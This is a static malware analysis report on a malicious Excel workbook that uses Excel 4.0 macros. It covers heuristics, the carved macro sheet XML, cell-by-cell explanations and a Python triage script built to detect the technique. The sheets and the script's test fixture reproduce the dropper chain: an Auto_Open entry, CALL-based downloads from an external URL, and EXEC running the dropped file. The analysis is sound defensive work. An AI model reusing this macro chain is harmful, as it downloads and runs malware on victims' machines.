Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 925fbe8236231803…

MALICIOUS

Office (OOXML)

Size: 527.6 KB
Created: 2006-09-16 00:00:00 UTC (the stock creation timestamp carried by Office's default templates; it says nothing about when this file was built)
Authoring application: Microsoft Excel 14.0300 (Excel 2010)
First seen: 2021-02-09
MD5: a015f1fc52194c4335ddb22ec9b68c62
SHA-1: ebc952725958f70ac1a86be38c4df2f611543736
SHA-256: 925fbe8236231803a646943d7c0d8671bc631d0095de87030cf1c460055fd677
Risk score: 262

Heuristics (6)

  • [critical] OOXML_XLM_MACROSHEET: Excel 4.0 macro sheet (2 sheets), 3 related findings
    Spreadsheet contains Excel 4.0 (XLM) macro sheets. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls until Microsoft disabled Excel 4.0 macros by default. Legitimate XLM use is rare in modern workbooks, so the presence of xl/macrosheets/ parts is itself a strong signal.
  • [critical] OOXML_XLM_AUTOOPEN_DEFINEDNAME: Excel 4.0 Auto_Open defined name
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros: the name's target cell is the entry point Excel runs on open (or close) once macros are enabled, so resolve it in xl/workbook.xml to find where the chain starts.
  • [critical] OOXML_XLM_DANGEROUS_FN: Dangerous XLM formula functions: HALT, CALL, EXEC, RUN
    The macro sheet uses formula functions that reach outside the workbook or chain macro stages: CALL and REGISTER invoke an arbitrary export of any DLL by name, EXEC starts a process, FORMULA writes formulas into cells at run time, and RUN/HALT transfer and end control. These are the primitives XLM droppers use to download payloads, write files and start processes without any VBA.
  • [critical] OOXML_XLM_BINARY_WINAPI_STRINGS: Binary XLM macro sheet with WinAPI/download strings
    Rule description: an Excel 4.0 macro sheet stored as BIFF12/XLSB binary data contains Win32 download or process-execution API names such as URLDownloadToFileA, ShellExecuteA or CreateDirectoryA. These names are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse. Caveat for this sample: both macro sheets were carved as XML parts (xl/macrosheets/sheet1.xml and sheet2.xml, below), not BIFF12 streams, and the DLL and export names for the first two CALLs are spliced together from shared-string cells, so corroborate the matched API names against xl/sharedStrings.xml rather than against the sheet XML alone.
  • [medium] SE_ENABLE_LURE: Macro/content-enable lure
    Document instructs the user to enable macros or editing, a common dropper technique for getting past Office's macro security prompt; the lure is what turns the Auto_Open name above into actual execution.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    Extracted from document text (OOXML body / shared strings):
      http://netstation.store/img/superts.php
      http://schemas.openxmlformats.org/spreadsheetml/2006/main
      http://schemas.microsoft.com/office/excel/2006/main
      http://schemas.openxmlformats.org/officeDocument/2006/relationships
      http://schemas.openxmlformats.org/markup-compatibility/2006
      http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
    Only the first entry is an external endpoint. The macro sheet below passes shared-string cell A50 as the URL argument of both download CALLs; confirm that A50 resolves to this URL in xl/sharedStrings.xml before treating the two as linked. The five schemas.* entries are XML namespace URIs from the parts' xmlns declarations (visible in the macro sheet headers below); they identify the OOXML/SpreadsheetML schemas and are not network indicators.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename          Kind            Source                                            Size
xlm_sheet_00.xml  xlm-macrosheet  OOXML XLM macro sheet: xl/macrosheets/sheet2.xml  1400 bytes
xlm_sheet_01.xml  xlm-macrosheet  OOXML XLM macro sheet: xl/macrosheets/sheet1.xml  6311 bytes

xlm_sheet_00.xml (xl/macrosheets/sheet2.xml, 1400 bytes)
SHA-256: 97c0a38b067b7bcdf25006ad4152a4f3d342849f2138e7a8c461771c97adea9d
This sheet holds a single formula, HALT() at FJ333, which is the target of RUN('Doc2'!FJ333) in the other macro sheet: it is the macro's termination stub, and the workbook-level sheet name Doc2 evidently maps to this part. The surrounding cells FJ330:FK335 are empty styled cells.
Preview (extracted XML, first 1,000 lines):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac">
<dimension ref="FJ330:FK335"/>
<sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews>
<sheetFormatPr defaultColWidth="4.44140625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
<sheetData>
<row r="330" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ330" s="1"/><c r="FK330" s="1"/></row>
<row r="331" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ331" s="1"/><c r="FK331" s="1"/></row>
<row r="332" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ332" s="1"/><c r="FK332" s="1"/></row>
<row r="333" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ333" s="1" t="b"><f>HALT()</f><v>1</v></c><c r="FK333" s="1"/></row>
<row r="334" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ334" s="1"/><c r="FK334" s="1"/></row>
<row r="335" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ335" s="1"/><c r="FK335" s="1"/></row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
xlm_sheet_01.xml (xl/macrosheets/sheet1.xml, 6311 bytes)
SHA-256: 8c3ab64232e7a96fad94d6875391b2e5005c12f4027458afcd9112ec806360cd
This is the working sheet; 'Doc1' in the formulas is its own name (the referenced cells AC16, AD16, AF16, ... are in this part). Apart from empty styled cells and shared-string fragments it contains five formula cells, listed here with the result Excel cached in <v> when the workbook was last calculated and saved. Those cached values were produced on the author's side, not by this static analysis.
  AA14  CALL('Doc1'!AC16&'Doc1'!AC17, 'Doc1'!AD16&'Doc1'!AD17, "JCJ", 'Doc1'!AF16, 0)  cached 1
        DLL name and export name are each spliced from two shared-string cells; the type string "JCJ" declares a long return with (null-terminated string, long) arguments.
  AA15  CALL('Doc1'!AC19&'Doc1'!AC20, 'Doc1'!AD19&...&'Doc1'!AD22, 'Doc1'!AE19&'Doc1'!AE20, 0, A50, 'Doc1'!AF16&'Doc1'!AF20, 0, 0)  cached 0
        DLL, export and type string again come from shared strings; the five trailing arguments (0, <A50>, <AF16&AF20>, 0, 0) have the parameter shape of URLDownloadToFileA, with A50 as the URL and AF16&AF20 as the destination path.
  AA16  CALL("INSENG", "DownloadFile", "BCCJ", A50, AF16&AF20, 1)  cached #NUM!
        Second, literal download attempt through inseng.dll's DownloadFile with the same URL cell and destination; #NUM! is the error Excel cached for it.
  AA17  EXEC('Doc1'!AC24&'Doc1'!AC25&"C:\orwkw\kkfm.reo"&'Doc1'!AD24&'Doc1'!AD25)  cached 33
        Launches the dropped file; the command prefix and suffix around C:\orwkw\kkfm.reo are shared strings, so the launcher cannot be read from this part alone.
  AA18  RUN('Doc2'!FJ333)  cached 0
        Transfers control to HALT() in the other macro sheet.
The string cells these formulas read (AC16/AC17, AD16/AD17, AF16, AC19/AC20, AD19-AD22, AE19/AE20, AF20, AC24/AC25, AD24/AD25 and A50) carry shared-string indexes 0-17 and 29, so xl/sharedStrings.xml is the part that resolves the DLL names, API names, URL and command line.
Preview (extracted XML, first 1,000 lines):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac">
<dimension ref="A11:AG52"/>
<sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews>
<sheetFormatPr defaultColWidth="4.44140625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
<cols><col min="1" max="26" width="4.44140625" style="2"/><col min="27" max="27" width="4.44140625" style="2" customWidth="1"/><col min="28" max="16384" width="4.44140625" style="2"/></cols>
<sheetData>
<row r="11" spans="27:33" x14ac:dyDescent="0.3"><c r="AA11" s="1"/><c r="AB11" s="1"/><c r="AC11" s="1"/><c r="AD11" s="1"/><c r="AE11" s="1"/><c r="AF11" s="1"/><c r="AG11" s="1"/></row>
<row r="12" spans="27:33" x14ac:dyDescent="0.3"><c r="AA12" s="1"/><c r="AB12" s="1"/><c r="AC12" s="1"/><c r="AD12" s="1"/><c r="AE12" s="1"/><c r="AF12" s="1"/><c r="AG12" s="1"/></row>
<row r="13" spans="27:33" x14ac:dyDescent="0.3"><c r="AA13" s="1"/><c r="AB13" s="1"/><c r="AC13" s="1"/><c r="AD13" s="1"/><c r="AE13" s="1"/><c r="AF13" s="1"/><c r="AG13" s="1"/></row>
<row r="14" spans="27:33" x14ac:dyDescent="0.3"><c r="AA14" s="1"><f>CALL('Doc1'!AC16&amp;'Doc1'!AC17,'Doc1'!AD16&amp;'Doc1'!AD17,"JCJ",'Doc1'!AF16,0)</f><v>1</v></c><c r="AB14" s="1"/><c r="AC14" s="1"/><c r="AD14" s="1"/><c r="AE14" s="1"/><c r="AF14" s="1"/><c r="AG14" s="1"/></row>
<row r="15" spans="27:33" x14ac:dyDescent="0.3"><c r="AA15" s="1"><f>CALL('Doc1'!AC19&amp;'Doc1'!AC20,'Doc1'!AD19&amp;'Doc1'!AD20&amp;'Doc1'!AD21&amp;'Doc1'!AD22,'Doc1'!AE19&amp;'Doc1'!AE20,0,A50,'Doc1'!AF16&amp;'Doc1'!AF20,0,0)</f><v>0</v></c><c r="AB15" s="1"/><c r="AC15" s="1"/><c r="AD15" s="1"/><c r="AE15" s="1"/><c r="AF15" s="1"/><c r="AG15" s="1"/></row>
<row r="16" spans="27:33" x14ac:dyDescent="0.3"><c r="AA16" s="1" t="e"><f>CALL("INSENG","DownloadFile","BCCJ",A50,AF16&amp;AF20,1)</f><v>#NUM!</v></c><c r="AB16" s="1"/><c r="AC16" s="1" t="s"><v>0</v></c><c r="AD16" s="1" t="s"><v>2</v></c><c r="AE16" s="1" t="s"><v>4</v></c><c r="AF16" s="1" t="s"><v>5</v></c><c r="AG16" s="1"/></row>
<row r="17" spans="27:33" x14ac:dyDescent="0.3"><c r="AA17" s="1"><f>EXEC('Doc1'!AC24&amp;'Doc1'!AC25&amp;"C:\orwkw\kkfm.reo"&amp;'Doc1'!AD24&amp;'Doc1'!AD25)</f><v>33</v></c><c r="AB17" s="1"/><c r="AC17" s="1" t="s"><v>1</v></c><c r="AD17" s="1" t="s"><v>3</v></c><c r="AE17" s="1"/><c r="AF17" s="1"/><c r="AG17" s="1"/></row>
<row r="18" spans="27:33" x14ac:dyDescent="0.3"><c r="AA18" s="1" t="b"><f>RUN('Doc2'!FJ333)</f><v>0</v></c><c r="AB18" s="1"/><c r="AC18" s="1"/><c r="AD18" s="1"/><c r="AE18" s="1"/><c r="AF18" s="1"/><c r="AG18" s="1"/></row>
<row r="19" spans="27:33" x14ac:dyDescent="0.3"><c r="AA19" s="1"/><c r="AB19" s="1"/><c r="AC19" s="1" t="s"><v>6</v></c><c r="AD19" s="1" t="s"><v>6</v></c><c r="AE19" s="1" t="s"><v>9</v></c><c r="AF19" s="1"/><c r="AG19" s="1"/></row>
<row r="20" spans="27:33" x14ac:dyDescent="0.3"><c r="AA20" s="1"/><c r="AB20" s="1"/><c r="AC20" s="1" t="s"><v>15</v></c><c r="AD20" s="1" t="s"><v>16</v></c><c r="AE20" s="1" t="s"><v>10</v></c><c r="AF20" s="1" t="s"><v>17</v></c><c r="AG20" s="1"/></row>
<row r="21" spans="27:33" x14ac:dyDescent="0.3"><c r="AA21" s="1"/><c r="AB21" s="1"/><c r="AC21" s="1"/><c r="AD21" s="1" t="s"><v>7</v></c><c r="AE21" s="1"/><c r="AF21" s="1"/><c r="AG21" s="1"/></row>
<row r="22" spans="27:33" x14ac:dyDescent="0.3"><c r="AA22" s="1"/><c r="AB22" s="1"/><c r="AC22" s="1"/><c r="AD22" s="1" t="s"><v>8</v></c><c r="AE22" s="1"/><c r="AF22" s="1"/><c r="AG22" s="1"/></row>
<row r="23" spans="27:33" x14ac:dyDescent="0.3"><c r="AA23" s="1"/><c r="AB23" s="1"/><c r="AC23" s="1"/><c r="AD23" s="1"/><c r="AE23" s="1"/><c r="AF23" s="1"/><c r="AG23" s="1"/></row>
<row r="24" spans="27:33" x14ac:dyDescent="0.3"><c r="AA24" s="1"/><c r="AB24" s="1"/><c r="AC24" s="1" t="s"><v>11</v></c><c r="AD24" s="1" t="s"><v>13</v></c><c r="AE24" s="1"/><c r="AF24" s="1"/><c r="AG24" s="1"/></row>
<row r="25" spans="27:33" x14ac:dyDescent="0.3"><c r="AA25" s="1"/><c r="AB25" s="1"/><c r="AC25" s="1" t="s"><v>12</v></c><c r="AD25" s="1" t="s"><v>14</v></c><c r="AE25" s="1"/><c r="AF25" s="1"/><c r="AG25" s="1"/></row>
<row r="26" spans="27:33" x14ac:dyDescent="0.3"><c r="AA26" s="1"/><c r="AB26" s="1"/><c r="AC26" s="1"/><c r="AD26" s="1"/><c r="AE26" s="1"/><c r="AF26" s="1"/><c r="AG26" s="1"/></row>
<row r="27" spans="27:33" x14ac:dyDescent="0.3"><c r="AA27" s="1"/><c r="AB27" s="1"/><c r="AC27" s="1"/><c r="AD27" s="1"/><c r="AE27" s="1"/><c r="AF27" s="1"/><c r="AG27" s="1"/></row>
<row r="28" spans="27:33" x14ac:dyDescent="0.3"><c r="AA28" s="1"/><c r="AB28" s="1"/><c r="AC28" s="1"/><c r="AD28" s="1"/><c r="AE28" s="1"/><c r="AF28" s="1"/><c r="AG28" s="1"/></row>
<row r="29" spans="27:33" x14ac:dyDescent="0.3"><c r="AA29" s="1"/><c r="AB29" s="1"/><c r="AC29" s="1"/><c r="AD29" s="1"/><c r="AE29" s="1"/><c r="AF29" s="1"/><c r="AG29" s="1"/></row>
<row r="30" spans="27:33" x14ac:dyDescent="0.3"><c r="AA30" s="1"/><c r="AB30" s="1"/><c r="AC30" s="1"/><c r="AD30" s="1"/><c r="AE30" s="1"/><c r="AF30" s="1"/><c r="AG30" s="1"/></row>
<row r="31" spans="27:33" x14ac:dyDescent="0.3"><c r="AA31" s="1"/><c r="AB31" s="1"/><c r="AC31" s="1"/><c r="AD31" s="1"/><c r="AE31" s="1"/><c r="AF31" s="1"/><c r="AG31" s="1"/></row>
<row r="46" spans="1:1" x14ac:dyDescent="0.3"><c r="A46" s="1"/></row>
<row r="47" spans="1:1" x14ac:dyDescent="0.3"><c r="A47" s="1"/></row>
<row r="48" spans="1:1" x14ac:dyDescent="0.3"><c r="A48" s="1"/></row>
<row r="49" spans="1:1" x14ac:dyDescent="0.3"><c r="A49" s="1"/></row>
<row r="50" spans="1:1" x14ac:dyDescent="0.3"><c r="A50" s="1" t="s"><v>29</v></c></row>
<row r="51" spans="1:1" x14ac:dyDescent="0.3"><c r="A51" s="1"/></row>
<row r="52" spans="1:1" x14ac:dyDescent="0.3"><c r="A52" s="1"/></row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
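The heuristics above and the two carved sheets together describe a triage procedure: list the xl/macrosheets/ parts, read the Auto_Open defined name, pull the formula cells, resolve the shared-string fragments that the CALL and EXEC arguments are spliced from, decode the CALL type string, and separate real URLs from namespace URIs. The Python below is an added example of that procedure; it is not the report's scanner or any code from the sample's author. It runs over a workbook it constructs in memory whose macro sheet mirrors the formula cells of sheet1.xml above. The shared-string values it fills in (Kern/el32, CreateDir/ectoryA, URL/Mon, the rundll32 command line and so on) and the Auto_Open target Doc1!$AA$14 are assumptions chosen to illustrate the split-string pattern, not strings recovered from this sample; only the URL and the C:\orwkw\kkfm.reo path are taken from the report.

```python
# Added example (not the report's scanner): the XLM heuristics above, run over an
# in-memory workbook modelled on the carved sheet1.xml. Every shared-string value
# and the Auto_Open target are ASSUMED placeholders, not recovered from the sample.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
XM = "http://schemas.microsoft.com/office/excel/2006/main"
DANGEROUS_FN = re.compile(r"\b(CALL|REGISTER|EXEC|RUN|HALT|FORMULA)\s*\(")
# xmlns declarations look like URLs to a naive scan; these prefixes are schema IDs, not endpoints.
NAMESPACE_PREFIXES = ("http://schemas.openxmlformats.org/", "http://schemas.microsoft.com/office/")
# Excel 4.0 CALL/REGISTER type-string codes (subset); the first character is the return type.
XLM_TYPE_CODES = {"A": "bool", "B": "double", "C": "char*", "D": "byte-counted string", "E": "double*",
                  "F": "char* (in-place)", "H": "unsigned short", "I": "short", "J": "long", "L": "bool*"}
CELL_REF = re.compile(r"(?<![A-Za-z0-9_\"])(?:'[^']+'!)?\$?([A-Z]{1,3})\$?(\d+)")
CONCAT = re.compile(r'"([^"]*)"&"([^"]*)"')

def shared_strings(zf):
    if "xl/sharedStrings.xml" not in zf.namelist():
        return []
    root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(f"{{{MAIN}}}t")) for si in root.iter(f"{{{MAIN}}}si")]

def auto_open_names(zf):
    root = ET.fromstring(zf.read("xl/workbook.xml"))
    return [(d.get("name"), (d.text or "").strip()) for d in root.iter(f"{{{MAIN}}}definedName")
            if d.get("name") in ("_xlnm.Auto_Open", "_xlnm.Auto_Close")]

def sheet_cells(zf, part, sst):
    # cell ref -> ("formula", text, cached <v> value) | ("string", resolved shared string, None)
    cells = {}
    for c in ET.fromstring(zf.read(part)).iter(f"{{{MAIN}}}c"):
        f, v = c.find(f"{{{MAIN}}}f"), c.find(f"{{{MAIN}}}v")
        if f is not None:
            cells[c.get("r")] = ("formula", f.text or "", None if v is None else v.text)
        elif v is not None and c.get("t") == "s":
            cells[c.get("r")] = ("string", sst[int(v.text)], None)
    return cells

def deobfuscate(formula, cells):
    # Inline same-sheet string cells, then fold "a"&"b" into "ab" until stable. Cross-sheet refs
    # such as 'Doc2'!FJ333 stay as written: mapping sheet names to parts needs workbook.xml + rels.
    def inline(m):
        ent = cells.get(m.group(1) + m.group(2))
        return '"%s"' % ent[1] if ent and ent[0] == "string" else m.group(0)
    expr = CELL_REF.sub(inline, formula)
    while True:
        folded = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', expr)
        if folded == expr:
            return expr
        expr = folded

def decode_type_string(ts):
    names = [XLM_TYPE_CODES.get(ch, "?" + ch) for ch in ts]
    return names[0], names[1:]

def extract_urls(zf):
    urls, ns = set(), set()
    for name in zf.namelist():
        for u in re.findall(rb"https?://[^\s\"'<>]+", zf.read(name)):
            u = u.decode("ascii", "replace")
            (ns if u.startswith(NAMESPACE_PREFIXES) else urls).add(u)
    return sorted(urls), sorted(ns)

def triage(data):
    zf = zipfile.ZipFile(io.BytesIO(data))
    sst = shared_strings(zf)
    parts = sorted(n for n in zf.namelist() if n.startswith("xl/macrosheets/") and n.endswith(".xml"))
    report = {"macrosheets": parts, "auto_open": auto_open_names(zf), "formulas": []}
    for part in parts:
        cells = sheet_cells(zf, part, sst)
        for ref, (kind, text, cached) in sorted(cells.items()):
            if kind != "formula":
                continue
            deob = deobfuscate(text, cells)
            entry = {"part": part, "cell": ref, "raw": text, "deobfuscated": deob,
                     "cached": cached, "dangerous": sorted(set(DANGEROUS_FN.findall(deob)))}
            m = re.match(r'CALL\("([^"]*)","([^"]*)","([A-Z]+)"', deob)
            if m:  # module, export and decoded signature once the CALL arguments are literal
                entry["call"] = (m.group(1), m.group(2), decode_type_string(m.group(3)))
            report["formulas"].append(entry)
    report["urls"], report["namespace_uris"] = extract_urls(zf)
    return report

# Constructed input. Strings 0-15 are placeholders for the split-string pattern; only the
# URL and the C:\orwkw\kkfm.reo path are taken from the report.
_SST = ["Kern", "el32", "CreateDir", "ectoryA", r"C:\orwkw", r"\kkfm.reo", "URL", "Mon", "Download",
        "To", "FileA", "JJCC", "JJ", "http://netstation.store/img/superts.php", "rundll32 ", ",DllRegisterServer"]
_SHEET1 = f"""<xm:macrosheet xmlns="{MAIN}" xmlns:xm="{XM}"><sheetData>
<row r="14"><c r="AA14"><f>CALL('Doc1'!AC16&amp;'Doc1'!AC17,'Doc1'!AD16&amp;'Doc1'!AD17,"JCJ",'Doc1'!AF16,0)</f><v>1</v></c></row>
<row r="15"><c r="AA15"><f>CALL('Doc1'!AC19&amp;'Doc1'!AC20,'Doc1'!AD19&amp;'Doc1'!AD20&amp;'Doc1'!AD21&amp;'Doc1'!AD22,'Doc1'!AE19&amp;'Doc1'!AE20,0,A50,'Doc1'!AF16&amp;'Doc1'!AF20,0,0)</f><v>0</v></c></row>
<row r="16"><c r="AA16" t="e"><f>CALL("INSENG","DownloadFile","BCCJ",A50,AF16&amp;AF20,1)</f><v>#NUM!</v></c><c r="AC16" t="s"><v>0</v></c><c r="AD16" t="s"><v>2</v></c><c r="AF16" t="s"><v>4</v></c></row>
<row r="17"><c r="AA17"><f>EXEC('Doc1'!AC24&amp;"C:\\orwkw\\kkfm.reo"&amp;'Doc1'!AD24)</f><v>33</v></c><c r="AC17" t="s"><v>1</v></c><c r="AD17" t="s"><v>3</v></c></row>
<row r="18"><c r="AA18" t="b"><f>RUN('Doc2'!FJ333)</f><v>0</v></c></row>
<row r="19"><c r="AC19" t="s"><v>6</v></c><c r="AD19" t="s"><v>6</v></c><c r="AE19" t="s"><v>11</v></c></row><row r="20"><c r="AC20" t="s"><v>7</v></c><c r="AD20" t="s"><v>8</v></c><c r="AE20" t="s"><v>12</v></c><c r="AF20" t="s"><v>5</v></c></row>
<row r="21"><c r="AD21" t="s"><v>9</v></c></row><row r="22"><c r="AD22" t="s"><v>10</v></c></row><row r="24"><c r="AC24" t="s"><v>14</v></c><c r="AD24" t="s"><v>15</v></c></row>
<row r="50"><c r="A50" t="s"><v>13</v></c></row></sheetData></xm:macrosheet>"""
_SHEET2 = f'<xm:macrosheet xmlns="{MAIN}" xmlns:xm="{XM}"><sheetData><row r="333"><c r="FJ333" t="b"><f>HALT()</f><v>1</v></c></row></sheetData></xm:macrosheet>'
_WORKBOOK = (f'<workbook xmlns="{MAIN}"><sheets><sheet name="Doc1" sheetId="1"/><sheet name="Doc2" sheetId="2"/></sheets>'
             '<definedNames><definedName name="_xlnm.Auto_Open">Doc1!$AA$14</definedName></definedNames></workbook>')

def build_sample():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.xml", _WORKBOOK)
        zf.writestr("xl/sharedStrings.xml", f'<sst xmlns="{MAIN}">' + "".join(f"<si><t>{s}</t></si>" for s in _SST) + "</sst>")
        zf.writestr("xl/macrosheets/sheet1.xml", _SHEET1)
        zf.writestr("xl/macrosheets/sheet2.xml", _SHEET2)
    return buf.getvalue()
```

`triage(build_sample())` returns a dict: `deobfuscated` is the field a reviewer reads, `cached` is the value Excel saved in `<v>`, `call` carries the DLL, export and decoded type string once all three are literal, and `namespace_uris` collects the schema URLs that the report's EMBEDDED_URL rule also surfaced so they are not mistaken for indicators. Cross-sheet references are deliberately left unresolved; extending the resolver means parsing xl/workbook.xml and xl/_rels/workbook.xml.rels to map sheet names such as Doc2 to their parts.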